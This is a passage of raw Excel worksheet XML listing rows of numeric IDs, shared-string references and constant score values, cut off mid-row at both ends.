        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1656" ht="15.75" customHeight="1">
      <c r="A1656" s="1">
        <v>11434.0</v>
      </c>
      <c r="B1656" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C1656" s="2" t="s">
        <v>1510</v>
      </c>
      <c r="D1656" s="2">
        <v>1.0</v>
      </c>
      <c r="E1656" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1656" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1657" ht="15.75" customHeight="1">
      <c r="A1657" s="1">
        <v>11908.0</v>
      </c>
      <c r="B1657" s="2">
        <v>2.5208596E7</v>
      </c>
      <c r="C1657" s="2" t="s">
        <v>1511</v>
      </c>
      <c r="D1657" s="2">
        <v>1.0</v>
      </c>
      <c r="E1657" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1657" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1658" ht="15.75" customHeight="1">
      <c r="A1658" s="1">
        <v>13169.0</v>
      </c>
      <c r="B1658" s="2">
        <v>3.3979847E7</v>
      </c>
      <c r="C1658" s="2" t="s">
        <v>1512</v>
      </c>
      <c r="D1658" s="2">
        <v>1.0</v>
      </c>
      <c r="E1658" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1658" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1659" ht="15.75" customHeight="1">
      <c r="A1659" s="1">
        <v>13220.0</v>
      </c>
      <c r="B1659" s="2">
        <v>3.4219439E7</v>
      </c>
      <c r="C1659" s="2" t="s">
        <v>1513</v>
      </c>
      <c r="D1659" s="2">
        <v>1.0</v>
      </c>
      <c r="E1659" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1659" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1660" ht="15.75" customHeight="1">
      <c r="A1660" s="1">
        <v>13724.0</v>
      </c>
      <c r="B1660" s="2">
        <v>3.6356076E7</v>
      </c>
      <c r="C1660" s="2" t="s">
        <v>1514</v>
      </c>
      <c r="D1660" s="2">
        <v>1.0</v>
      </c>
      <c r="E1660" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1660" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1661" ht="15.75" customHeight="1">
      <c r="A1661" s="1">
        <v>13890.0</v>
      </c>
      <c r="B1661" s="2">
        <v>3.7024865E7</v>
      </c>
      <c r="C1661" s="2" t="s">
        <v>1515</v>
      </c>
      <c r="D1661" s="2">
        <v>1.0</v>
      </c>
      <c r="E1661" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1661" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1662" ht="15.75" customHeight="1">
      <c r="A1662" s="1">
        <v>13900.0</v>
      </c>
      <c r="B1662" s="2">
        <v>3.7053641E7</v>
      </c>
      <c r="C1662" s="2" t="s">
        <v>1516</v>
      </c>
      <c r="D1662" s="2">
        <v>1.0</v>
      </c>
      <c r="E1662" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1662" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1663" ht="15.75" customHeight="1">
      <c r="A1663" s="1">
        <v>14062.0</v>
      </c>
      <c r="B1663" s="2">
        <v>3.7573227E7</v>
      </c>
      <c r="C1663" s="2" t="s">
        <v>1517</v>
      </c>
      <c r="D1663" s="2">
        <v>1.0</v>
      </c>
      <c r="E1663" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1663" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1664" ht="15.75" customHeight="1">
      <c r="A1664" s="1">
        <v>14201.0</v>
      </c>
      <c r="B1664" s="2">
        <v>3.8233099E7</v>
      </c>
      <c r="C1664" s="2" t="s">
        <v>1518</v>
      </c>
      <c r="D1664" s="2">
        <v>1.0</v>
      </c>
      <c r="E1664" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1664" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1665" ht="15.75" customHeight="1">
      <c r="A1665" s="1">
        <v>14677.0</v>
      </c>
      <c r="B1665" s="2">
        <v>4.0469939E7</v>
      </c>
      <c r="C1665" s="2" t="s">
        <v>1519</v>
      </c>
      <c r="D1665" s="2">
        <v>1.0</v>
      </c>
      <c r="E1665" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1665" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1666" ht="15.75" customHeight="1">
      <c r="A1666" s="1">
        <v>14870.0</v>
      </c>
      <c r="B1666" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C1666" s="2" t="s">
        <v>1520</v>
      </c>
      <c r="D1666" s="2">
        <v>1.0</v>
      </c>
      <c r="E1666" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1666" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1667" ht="15.75" customHeight="1">
      <c r="A1667" s="1">
        <v>15093.0</v>
      </c>
      <c r="B1667" s="2">
        <v>4.1791629E7</v>
      </c>
      <c r="C1667" s="2" t="s">
        <v>1521</v>
      </c>
      <c r="D1667" s="2">
        <v>1.0</v>
      </c>
      <c r="E1667" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1667" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1668" ht="15.75" customHeight="1">
      <c r="A1668" s="1">
        <v>15197.0</v>
      </c>
      <c r="B1668" s="2">
        <v>4.2069036E7</v>
      </c>
      <c r="C1668" s="2" t="s">
        <v>1522</v>
      </c>
      <c r="D1668" s="2">
        <v>1.0</v>
      </c>
      <c r="E1668" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1668" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1669" ht="15.75" customHeight="1">
      <c r="A1669" s="1">
        <v>15229.0</v>
      </c>
      <c r="B1669" s="2">
        <v>4.2197041E7</v>
      </c>
      <c r="C1669" s="2" t="s">
        <v>1523</v>
      </c>
      <c r="D1669" s="2">
        <v>1.0</v>
      </c>
      <c r="E1669" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1669" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1670" ht="15.75" customHeight="1">
      <c r="A1670" s="1">
        <v>15439.0</v>
      </c>
      <c r="B1670" s="2">
        <v>4.2983761E7</v>
      </c>
      <c r="C1670" s="2" t="s">
        <v>1524</v>
      </c>
      <c r="D1670" s="2">
        <v>1.0</v>
      </c>
      <c r="E1670" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1670" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1671" ht="15.75" customHeight="1">
      <c r="A1671" s="1">
        <v>15455.0</v>
      </c>
      <c r="B1671" s="2">
        <v>4.3077637E7</v>
      </c>
      <c r="C1671" s="2" t="s">
        <v>1525</v>
      </c>
      <c r="D1671" s="2">
        <v>1.0</v>
      </c>
      <c r="E1671" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1671" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1672" ht="15.75" customHeight="1">
      <c r="A1672" s="1">
        <v>16412.0</v>
      </c>
      <c r="B1672" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C1672" s="2" t="s">
        <v>1526</v>
      </c>
      <c r="D1672" s="2">
        <v>1.0</v>
      </c>
      <c r="E1672" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1672" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1673" ht="15.75" customHeight="1">
      <c r="A1673" s="1">
        <v>16879.0</v>
      </c>
      <c r="B1673" s="2">
        <v>4.7983916E7</v>
      </c>
      <c r="C1673" s="2" t="s">
        <v>1527</v>
      </c>
      <c r="D1673" s="2">
        <v>1.0</v>
      </c>
      <c r="E1673" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1673" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1674" ht="15.75" customHeight="1">
      <c r="A1674" s="1">
        <v>17079.0</v>
      </c>
      <c r="B1674" s="2">
        <v>4.8613207E7</v>
      </c>
      <c r="C1674" s="2" t="s">
        <v>1528</v>
      </c>
      <c r="D1674" s="2">
        <v>1.0</v>
      </c>
      <c r="E1674" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1674" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1675" ht="15.75" customHeight="1">
      <c r="A1675" s="1">
        <v>17202.0</v>
      </c>
      <c r="B1675" s="2">
        <v>4.901572E7</v>
      </c>
      <c r="C1675" s="2" t="s">
        <v>1529</v>
      </c>
      <c r="D1675" s="2">
        <v>1.0</v>
      </c>
      <c r="E1675" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1675" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1676" ht="15.75" customHeight="1">
      <c r="A1676" s="1">
        <v>17443.0</v>
      </c>
      <c r="B1676" s="2">
        <v>4.978552E7</v>
      </c>
      <c r="C1676" s="2" t="s">
        <v>1530</v>
      </c>
      <c r="D1676" s="2">
        <v>1.0</v>
      </c>
      <c r="E1676" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1676" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1677" ht="15.75" customHeight="1">
      <c r="A1677" s="1">
        <v>18208.0</v>
      </c>
      <c r="B1677" s="2">
        <v>5.2062865E7</v>
      </c>
      <c r="C1677" s="2" t="s">
        <v>1531</v>
      </c>
      <c r="D1677" s="2">
        <v>1.0</v>
      </c>
      <c r="E1677" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1677" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1678" ht="15.75" customHeight="1">
      <c r="A1678" s="1">
        <v>18372.0</v>
      </c>
      <c r="B1678" s="2">
        <v>5.2571668E7</v>
      </c>
      <c r="C1678" s="2" t="s">
        <v>1532</v>
      </c>
      <c r="D1678" s="2">
        <v>1.0</v>
      </c>
      <c r="E1678" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1678" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1679" ht="15.75" customHeight="1">
      <c r="A1679" s="1">
        <v>19544.0</v>
      </c>
      <c r="B1679" s="2">
        <v>5.6030506E7</v>
      </c>
      <c r="C1679" s="2" t="s">
        <v>1533</v>
      </c>
      <c r="D1679" s="2">
        <v>1.0</v>
      </c>
      <c r="E1679" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1679" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1680" ht="15.75" customHeight="1">
      <c r="A1680" s="1">
        <v>20053.0</v>
      </c>
      <c r="B1680" s="2">
        <v>8136182.0</v>
      </c>
      <c r="C1680" s="2" t="s">
        <v>1534</v>
      </c>
      <c r="D1680" s="2">
        <v>1.0</v>
      </c>
      <c r="E1680" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1680" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1681" ht="15.75" customHeight="1">
      <c r="A1681" s="1">
        <v>20319.0</v>
      </c>
      <c r="B1681" s="2">
        <v>1.1478634E7</v>
      </c>
      <c r="C1681" s="2" t="s">
        <v>1535</v>
      </c>
      <c r="D1681" s="2">
        <v>1.0</v>
      </c>
      <c r="E1681" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1681" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1682" ht="15.75" customHeight="1">
      <c r="A1682" s="1">
        <v>20371.0</v>
      </c>
      <c r="B1682" s="2">
        <v>1.1816896E7</v>
      </c>
      <c r="C1682" s="2" t="s">
        <v>1536</v>
      </c>
      <c r="D1682" s="2">
        <v>1.0</v>
      </c>
      <c r="E1682" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1682" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1683" ht="15.75" customHeight="1">
      <c r="A1683" s="1">
        <v>20428.0</v>
      </c>
      <c r="B1683" s="2">
        <v>1.2322122E7</v>
      </c>
      <c r="C1683" s="2" t="s">
        <v>1537</v>
      </c>
      <c r="D1683" s="2">
        <v>1.0</v>
      </c>
      <c r="E1683" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1683" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1684" ht="15.75" customHeight="1">
      <c r="A1684" s="1">
        <v>20521.0</v>
      </c>
      <c r="B1684" s="2">
        <v>1.3112148E7</v>
      </c>
      <c r="C1684" s="2" t="s">
        <v>1538</v>
      </c>
      <c r="D1684" s="2">
        <v>1.0</v>
      </c>
      <c r="E1684" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1684" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1685" ht="15.75" customHeight="1">
      <c r="A1685" s="1">
        <v>20590.0</v>
      </c>
      <c r="B1685" s="2">
        <v>1.3797437E7</v>
      </c>
      <c r="C1685" s="2" t="s">
        <v>1539</v>
      </c>
      <c r="D1685" s="2">
        <v>1.0</v>
      </c>
      <c r="E1685" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1685" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1686" ht="15.75" customHeight="1">
      <c r="A1686" s="1">
        <v>20808.0</v>
      </c>
      <c r="B1686" s="2">
        <v>1.532412E7</v>
      </c>
      <c r="C1686" s="2" t="s">
        <v>1540</v>
      </c>
      <c r="D1686" s="2">
        <v>1.0</v>
      </c>
      <c r="E1686" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1686" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1687" ht="15.75" customHeight="1">
      <c r="A1687" s="1">
        <v>20932.0</v>
      </c>
      <c r="B1687" s="2">
        <v>1.6424817E7</v>
      </c>
      <c r="C1687" s="2" t="s">
        <v>1541</v>
      </c>
      <c r="D1687" s="2">
        <v>1.0</v>
      </c>
      <c r="E1687" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1687" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1688" ht="15.75" customHeight="1">
      <c r="A1688" s="1">
        <v>21123.0</v>
      </c>
      <c r="B1688" s="2">
        <v>1.8346517E7</v>
      </c>
      <c r="C1688" s="2" t="s">
        <v>1542</v>
      </c>
      <c r="D1688" s="2">
        <v>1.0</v>
      </c>
      <c r="E1688" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1688" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1689" ht="15.75" customHeight="1">
      <c r="A1689" s="1">
        <v>21257.0</v>
      </c>
      <c r="B1689" s="2">
        <v>2.0040336E7</v>
      </c>
      <c r="C1689" s="2" t="s">
        <v>1543</v>
      </c>
      <c r="D1689" s="2">
        <v>1.0</v>
      </c>
      <c r="E1689" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1689" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1690" ht="15.75" customHeight="1">
      <c r="A1690" s="1">
        <v>21417.0</v>
      </c>
      <c r="B1690" s="2">
        <v>2.1988223E7</v>
      </c>
      <c r="C1690" s="2" t="s">
        <v>1544</v>
      </c>
      <c r="D1690" s="2">
        <v>1.0</v>
      </c>
      <c r="E1690" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1690" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1691" ht="15.75" customHeight="1">
      <c r="A1691" s="1">
        <v>21571.0</v>
      </c>
      <c r="B1691" s="2">
        <v>2.3792889E7</v>
      </c>
      <c r="C1691" s="2" t="s">
        <v>1545</v>
      </c>
      <c r="D1691" s="2">
        <v>1.0</v>
      </c>
      <c r="E1691" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1691" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1692" ht="15.75" customHeight="1">
      <c r="A1692" s="1">
        <v>21886.0</v>
      </c>
      <c r="B1692" s="2">
        <v>2.7761073E7</v>
      </c>
      <c r="C1692" s="2" t="s">
        <v>1546</v>
      </c>
      <c r="D1692" s="2">
        <v>1.0</v>
      </c>
      <c r="E1692" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1692" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1693" ht="15.75" customHeight="1">
      <c r="A1693" s="1">
        <v>22067.0</v>
      </c>
      <c r="B1693" s="2">
        <v>3.055967E7</v>
      </c>
      <c r="C1693" s="2" t="s">
        <v>1547</v>
      </c>
      <c r="D1693" s="2">
        <v>1.0</v>
      </c>
      <c r="E1693" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1693" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1694" ht="15.75" customHeight="1">
      <c r="A1694" s="1">
        <v>22125.0</v>
      </c>
      <c r="B1694" s="2">
        <v>3.1010633E7</v>
      </c>
      <c r="C1694" s="2" t="s">
        <v>1548</v>
      </c>
      <c r="D1694" s="2">
        <v>1.0</v>
      </c>
      <c r="E1694" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1694" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1695" ht="15.75" customHeight="1">
      <c r="A1695" s="1">
        <v>22234.0</v>
      </c>
      <c r="B1695" s="2">
        <v>3.2480612E7</v>
      </c>
      <c r="C1695" s="2" t="s">
        <v>1549</v>
      </c>
      <c r="D1695" s="2">
        <v>1.0</v>
      </c>
      <c r="E1695" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1695" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1696" ht="15.75" customHeight="1">
      <c r="A1696" s="1">
        <v>22267.0</v>
      </c>
      <c r="B1696" s="2">
        <v>3.310344E7</v>
      </c>
      <c r="C1696" s="2" t="s">
        <v>1550</v>
      </c>
      <c r="D1696" s="2">
        <v>1.0</v>
      </c>
      <c r="E1696" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1696" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1697" ht="15.75" customHeight="1">
      <c r="A1697" s="1">
        <v>22291.0</v>
      </c>
      <c r="B1697" s="2">
        <v>3.3507845E7</v>
      </c>
      <c r="C1697" s="2" t="s">
        <v>1551</v>
      </c>
      <c r="D1697" s="2">
        <v>1.0</v>
      </c>
      <c r="E1697" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1697" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1698" ht="15.75" customHeight="1">
      <c r="A1698" s="1">
        <v>22516.0</v>
      </c>
      <c r="B1698" s="2">
        <v>3.754804E7</v>
      </c>
      <c r="C1698" s="2" t="s">
        <v>1552</v>
      </c>
      <c r="D1698" s="2">
        <v>1.0</v>
      </c>
      <c r="E1698" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1698" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1699" ht="15.75" customHeight="1">
      <c r="A1699" s="1">
        <v>22753.0</v>
      </c>
      <c r="B1699" s="2">
        <v>4.4546422E7</v>
      </c>
      <c r="C1699" s="2" t="s">
        <v>1553</v>
      </c>
      <c r="D1699" s="2">
        <v>1.0</v>
      </c>
      <c r="E1699" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1699" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1700" ht="15.75" customHeight="1">
      <c r="A1700" s="1">
        <v>22754.0</v>
      </c>
      <c r="B1700" s="2">
        <v>4.4549366E7</v>
      </c>
      <c r="C1700" s="2" t="s">
        <v>1554</v>
      </c>
      <c r="D1700" s="2">
        <v>1.0</v>
      </c>
      <c r="E1700" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1700" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1701" ht="15.75" customHeight="1">
      <c r="A1701" s="1">
        <v>23322.0</v>
      </c>
      <c r="B1701" s="2">
        <v>5.439807E7</v>
      </c>
      <c r="C1701" s="2" t="s">
        <v>1555</v>
      </c>
      <c r="D1701" s="2">
        <v>1.0</v>
      </c>
      <c r="E1701" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1701" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1702" ht="15.75" customHeight="1">
      <c r="A1702" s="1">
        <v>23397.0</v>
      </c>
      <c r="B1702" s="2">
        <v>5.5762864E7</v>
      </c>
      <c r="C1702" s="2" t="s">
        <v>1556</v>
      </c>
      <c r="D1702" s="2">
        <v>1.0</v>
      </c>
      <c r="E1702" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1702" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1703" ht="15.75" customHeight="1">
      <c r="A1703" s="1">
        <v>23631.0</v>
      </c>
      <c r="B1703" s="2">
        <v>6567931.0</v>
      </c>
      <c r="C1703" s="2" t="s">
        <v>1557</v>
      </c>
      <c r="D1703" s="2">
        <v>1.0</v>
      </c>
      <c r="E1703" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1703" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1704" ht="15.75" customHeight="1">
      <c r="A1704" s="1">
        <v>23843.0</v>
      </c>
      <c r="B1704" s="2">
        <v>8148795.0</v>
      </c>
      <c r="C1704" s="2" t="s">
        <v>1558</v>
      </c>
      <c r="D1704" s="2">
        <v>1.0</v>
      </c>
      <c r="E1704" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1704" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1705" ht="15.75" customHeight="1">
      <c r="A1705" s="1">
        <v>23912.0</v>
      </c>
      <c r="B1705" s="2">
        <v>8526330.0</v>
      </c>
      <c r="C1705" s="2" t="s">
        <v>1559</v>
      </c>
      <c r="D1705" s="2">
        <v>1.0</v>
      </c>
      <c r="E1705" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1705" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1706" ht="15.75" customHeight="1">
      <c r="A1706" s="1">
        <v>23922.0</v>
      </c>
      <c r="B1706" s="2">
        <v>8555884.0</v>
      </c>
      <c r="C1706" s="2" t="s">
        <v>1537</v>
      </c>
      <c r="D1706" s="2">
        <v>1.0</v>
      </c>
      <c r="E1706" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1706" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1707" ht="15.75" customHeight="1">
      <c r="A1707" s="1">
        <v>24145.0</v>
      </c>
      <c r="B1707" s="2">
        <v>1.0068081E7</v>
      </c>
      <c r="C1707" s="2" t="s">
        <v>1560</v>
      </c>
      <c r="D1707" s="2">
        <v>1.0</v>
      </c>
      <c r="E1707" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1707" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1708" ht="15.75" customHeight="1">
      <c r="A1708" s="1">
        <v>24328.0</v>
      </c>
      <c r="B1708" s="2">
        <v>1.0664112E7</v>
      </c>
      <c r="C1708" s="2" t="s">
        <v>1561</v>
      </c>
      <c r="D1708" s="2">
        <v>1.0</v>
      </c>
      <c r="E1708" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1708" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1709" ht="15.75" customHeight="1">
      <c r="A1709" s="1">
        <v>24541.0</v>
      </c>
      <c r="B1709" s="2">
        <v>1.1218858E7</v>
      </c>
      <c r="C1709" s="2" t="s">
        <v>1562</v>
      </c>
      <c r="D1709" s="2">
        <v>1.0</v>
      </c>
      <c r="E1709" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1709" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1710" ht="15.75" customHeight="1">
      <c r="A1710" s="1">
        <v>24636.0</v>
      </c>
      <c r="B1710" s="2">
        <v>1.1478633E7</v>
      </c>
      <c r="C1710" s="2" t="s">
        <v>1535</v>
      </c>
      <c r="D1710" s="2">
        <v>1.0</v>
      </c>
      <c r="E1710" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1710" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1711" ht="15.75" customHeight="1">
      <c r="A1711" s="1">
        <v>24669.0</v>
      </c>
      <c r="B1711" s="2">
        <v>1.1577197E7</v>
      </c>
      <c r="C1711" s="2" t="s">
        <v>1563</v>
      </c>
      <c r="D1711" s="2">
        <v>1.0</v>
      </c>
      <c r="E1711" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1711" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1712" ht="15.75" customHeight="1">
      <c r="A1712" s="1">
        <v>24861.0</v>
      </c>
      <c r="B1712" s="2">
        <v>1.2208264E7</v>
      </c>
      <c r="C1712" s="2" t="s">
        <v>1564</v>
      </c>
      <c r="D1712" s="2">
        <v>1.0</v>
      </c>
      <c r="E1712" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1712" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1713" ht="15.75" customHeight="1">
      <c r="A1713" s="1">
        <v>24910.0</v>
      </c>
      <c r="B1713" s="2">
        <v>1.2322121E7</v>
      </c>
      <c r="C1713" s="2" t="s">
        <v>1565</v>
      </c>
      <c r="D1713" s="2">
        <v>1.0</v>
      </c>
      <c r="E1713" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1713" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1714" ht="15.75" customHeight="1">
      <c r="A1714" s="1">
        <v>24988.0</v>
      </c>
      <c r="B1714" s="2">
        <v>1.2686108E7</v>
      </c>
      <c r="C1714" s="2" t="s">
        <v>1566</v>
      </c>
      <c r="D1714" s="2">
        <v>1.0</v>
      </c>
      <c r="E1714" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1714" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1715" ht="15.75" customHeight="1">
      <c r="A1715" s="1">
        <v>25172.0</v>
      </c>
      <c r="B1715" s="2">
        <v>1.3112147E7</v>
      </c>
      <c r="C1715" s="2" t="s">
        <v>1567</v>
      </c>
      <c r="D1715" s="2">
        <v>1.0</v>
      </c>
      <c r="E1715" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1715" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1716" ht="15.75" customHeight="1">
      <c r="A1716" s="1">
        <v>25546.0</v>
      </c>
      <c r="B1716" s="2">
        <v>1.427743E7</v>
      </c>
      <c r="C1716" s="2" t="s">
        <v>1568</v>
      </c>
      <c r="D1716" s="2">
        <v>1.0</v>
      </c>
      <c r="E1716" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1716" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1717" ht="15.75" customHeight="1">
      <c r="A1717" s="1">
        <v>25984.0</v>
      </c>
      <c r="B1717" s="2">
        <v>1.5324119E7</v>
      </c>
      <c r="C1717" s="2" t="s">
        <v>1569</v>
      </c>
      <c r="D1717" s="2">
        <v>1.0</v>
      </c>
      <c r="E1717" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1717" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1718" ht="15.75" customHeight="1">
      <c r="A1718" s="1">
        <v>26283.0</v>
      </c>
      <c r="B1718" s="2">
        <v>1.6424816E7</v>
      </c>
      <c r="C1718" s="2" t="s">
        <v>1570</v>
      </c>
      <c r="D1718" s="2">
        <v>1.0</v>
      </c>
      <c r="E1718" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1718" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1719" ht="15.75" customHeight="1">
      <c r="A1719" s="1">
        <v>26372.0</v>
      </c>
      <c r="B1719" s="2">
        <v>1.6894979E7</v>
      </c>
      <c r="C1719" s="2" t="s">
        <v>1571</v>
      </c>
      <c r="D1719" s="2">
        <v>1.0</v>
      </c>
      <c r="E1719" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1719" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1720" ht="15.75" customHeight="1">
      <c r="A1720" s="1">
        <v>26475.0</v>
      </c>
      <c r="B1720" s="2">
        <v>1.7439753E7</v>
      </c>
      <c r="C1720" s="2" t="s">
        <v>1572</v>
      </c>
      <c r="D1720" s="2">
        <v>1.0</v>
      </c>
      <c r="E1720" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1720" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1721" ht="15.75" customHeight="1">
      <c r="A1721" s="1">
        <v>26593.0</v>
      </c>
      <c r="B1721" s="2">
        <v>1.7964716E7</v>
      </c>
      <c r="C1721" s="2" t="s">
        <v>1573</v>
      </c>
      <c r="D1721" s="2">
        <v>1.0</v>
      </c>
      <c r="E1721" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1721" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1722" ht="15.75" customHeight="1">
      <c r="A1722" s="1">
        <v>26629.0</v>
      </c>
      <c r="B1722" s="2">
        <v>1.8043957E7</v>
      </c>
      <c r="C1722" s="2" t="s">
        <v>1574</v>
      </c>
      <c r="D1722" s="2">
        <v>1.0</v>
      </c>
      <c r="E1722" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1722" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="1723" ht="15.75" customHeight="1">
      <c r="A1723" s="1">
        <v>26839.0</v>
